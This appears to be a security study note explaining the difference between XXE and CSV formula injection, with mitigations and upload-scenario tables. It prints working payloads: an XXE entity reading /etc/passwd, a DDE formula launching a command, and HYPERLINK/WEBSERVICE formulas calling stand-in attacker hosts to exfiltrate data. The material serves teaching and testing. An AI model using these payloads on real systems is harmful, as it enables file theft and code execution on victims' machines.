XXE and CSV Injection Difference
𧨠1. XXE (XML External Entity) Injection
Target: Applications that parse XML input
Cause: Improper XML parser configuration that allows external entity declarations
Exploitation: Attackers inject malicious XML with external entities that can:
Read local files (
file://)Perform SSRF (Server-Side Request Forgery)
Potentially execute remote code (in edge cases)
Example Payload:
1
2
3
4
5
6
7
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
Impact:
Data exfiltration (e.g.,
/etc/passwd)Internal network scans (via SSRF)
Denial of Service
π 2. CSV Injection (Formula Injection)
Target: Applications that export data to spreadsheets (like Excel)
Cause: Unescaped user input exported into CSV files
Exploitation: Attackers inject spreadsheet formulas like =cmd|' /C calc'!A0 that execute when the file is opened in Excel or similar
Example Payload:
1
=HYPERLINK("http://attacker.com","Click me")
or
1
=cmd|' /C calc'!A0
Impact:
Code execution (on the client machine)
Phishing via links
Exfiltration of data (e.g., using
WEBSERVICE()orHYPERLINK())
π§Ύ Summary Table
| Feature | XXE Injection | CSV Injection |
|---|---|---|
| Affects | XML parsers | Spreadsheet software (Excel, etc.) |
| Input type | XML | CSV / spreadsheet rows |
| Goal | Server-side file access, SSRF, etc. | Client-side code execution or phishing |
| Risk Level | Server compromise | Client compromise |
| Mitigation | Disable external entities in XML parsers | Sanitize values starting with =, +, -, @ |
Now you may ask - are excel sheets are combination of/written in xml language?
Nice catch β yes, modern Excel files (.xlsx) are actually ZIP archives that contain XML files inside. π²
Let me break that down:
π Modern Excel File Format (.xlsx)
Introduced with Office 2007, the
.xlsxformat is based on Open XML, a Microsoft-developed standard.If you rename an
.xlsxfile to.zipand unzip it, youβll see a structure like:
1
2
3
4
5
6
7
8
9
[Content_Types].xml
_rels/
xl/
workbook.xml
worksheets/
sheet1.xml
styles.xml
sharedStrings.xml
docProps/
Each worksheet (like sheet1.xml) is stored as an XML file describing cells, styles, data types, etc.
π So Does That Mean CSV = XML?
Nope! Even though .xlsx uses XML internally, CSV files are completely different:
| File Type | Format | Structure |
|---|---|---|
.xlsx | XML in ZIP | Complex, styled, structured |
.csv | Plain Text | Simple rows and columns separated by commas |
CSV files are just text-based and donβt use XML at all. Theyβre usually generated/exported as raw data, like:
1
2
Name,Email,Comment
John,john@example.com,"=HYPERLINK('http://evil.com')"
So, CSV Injection β XML, but Excel (the app) can process both .csv and .xlsx.
π Bottom Line
CSV injection abuses Excel formulas in
.csvfiles.XXE abuses vulnerabilities in XML parsers.
.xlsxfiles are XML-based, but CSVs are not.
CSV File upload Scenarios:
| Scenario | Vulnerability? | Payload Example | | ββββββββββββββββββββ | βββββββββββββββ | ββββββββββββ | | User uploads .csv resume file | β
Yes, if viewed in Excel | =WEBSERVICE("http://yourserver") | | You input a comment, and the site exports comments to .csv | β
Yes | =HYPERLINK("http://attacker.com") | | CSV file gets parsed server-side | β Usually safe (if no Excel viewing involved) | N/A |
XXE File upload Scenarios:
|Scenario|Vulnerability?|Notes / Payload Example| |β|β|β| |Site accepts .xml file upload|β
Yes|Try basic XXE to read file:///etc/passwd| |Site accepts .docx or .xlsx uploads|β
Sometimes|These are ZIP files with embedded XML (inject in word/document.xml, etc.)| |Site imports user config via XML|β
Yes|Classic XXE opportunity| |Site parses SVG files (theyβre XML too)|β
Yes|Inject <!ENTITY> inside SVG β many parsers are vulnerable| |Site parses XML but uses secure parser|β No|If external entities are disabled (good config), XXE wonβt work| |Site uses JSON only|β No|XXE only works in XML-based data| |Site returns an error after XML upload|π‘ Maybe|Could be trying to parse it β test further with blind XXE or SSRF payloads| |File upload leads to internal API processing XML|β
Yes|Upload XML file β backend service parses it (even if you donβt see output)|